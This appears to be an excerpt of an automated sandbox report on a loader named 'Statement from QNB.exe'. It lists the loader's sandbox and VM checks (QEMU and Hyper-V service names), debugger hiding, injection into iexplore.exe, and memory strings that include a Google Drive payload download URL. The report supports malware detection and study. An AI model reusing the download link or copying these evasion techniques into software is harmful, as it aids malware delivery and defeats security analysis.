                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmpBinary or memory string: ILES\QEMU-GA\QEMU-GA.EXE
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmpBinary or memory string: \QEMU-GA\QEMU-GA.EXE]
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmpBinary or memory string: \QEMU-GA.EXE
                    Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1YZH40PNS32XIEWW_X1KB4GXHZIPD-FNP
                    Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                    Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,17_2_00408B60
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_0230377C rdtsc 0_2_0230377C
                    Source: C:\Users\user\Desktop\Statement from QNB.exeWindow / User API: threadDelayed 9995Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00416A80 memset,GetSystemInfo,17_2_00416A80
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00406EC3
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,17_2_00408752
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,17_2_004080D9
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 18_2_0040423A FindFirstFileA,FindNextFileA,18_2_0040423A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen,20_2_0040537B
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSystem information queried: ModuleInformationJump to behavior
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW0O
                    Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmpBinary or memory string: iles\Qemu-ga\qemu-ga.exe
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                    Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmpBinary or memory string: \qemu-ga.exe
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmpBinary or memory string: \Qemu-ga\qemu-ga.exe]
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: vmicvss
                    Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81018130653.0000000000865000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499701669.000000000092E000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578596018.0000000000A5F000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81577732340.00000000009C8000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499073126.00000000008C2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@n
                    Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                    Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                    Anti Debugging:

                    barindex
                    Hides threads from debuggersShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,17_2_00408B60
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00404C9D LoadLibraryA,GetProcAddress,14_2_00404C9D
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_0230377C rdtsc 0_2_0230377C
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FD0BD mov eax, dword ptr fs:[00000030h]0_2_022FD0BD
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02302CF6 mov eax, dword ptr fs:[00000030h]0_2_02302CF6
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_023020CD mov eax, dword ptr fs:[00000030h]0_2_023020CD
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02304D65 mov eax, dword ptr fs:[00000030h]0_2_02304D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BED0BD mov eax, dword ptr fs:[00000030h]15_2_02BED0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF2CF6 mov eax, dword ptr fs:[00000030h]15_2_02BF2CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF20CD mov eax, dword ptr fs:[00000030h]15_2_02BF20CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF4D65 mov eax, dword ptr fs:[00000030h]15_2_02BF4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C2CF6 mov eax, dword ptr fs:[00000030h]21_2_006C2CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C20CD mov eax, dword ptr fs:[00000030h]21_2_006C20CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BD0BD mov eax, dword ptr fs:[00000030h]21_2_006BD0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C4D65 mov eax, dword ptr fs:[00000030h]21_2_006C4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF20CD mov eax, dword ptr fs:[00000030h]22_2_02CF20CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF2CF6 mov eax, dword ptr fs:[00000030h]22_2_02CF2CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CED0BD mov eax, dword ptr fs:[00000030h]22_2_02CED0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF4D65 mov eax, dword ptr fs:[00000030h]22_2_02CF4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_005720CD mov eax, dword ptr fs:[00000030h]23_2_005720CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00572CF6 mov eax, dword ptr fs:[00000030h]23_2_00572CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056D0BD mov eax, dword ptr fs:[00000030h]23_2_0056D0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00574D65 mov eax, dword ptr fs:[00000030h]23_2_00574D65
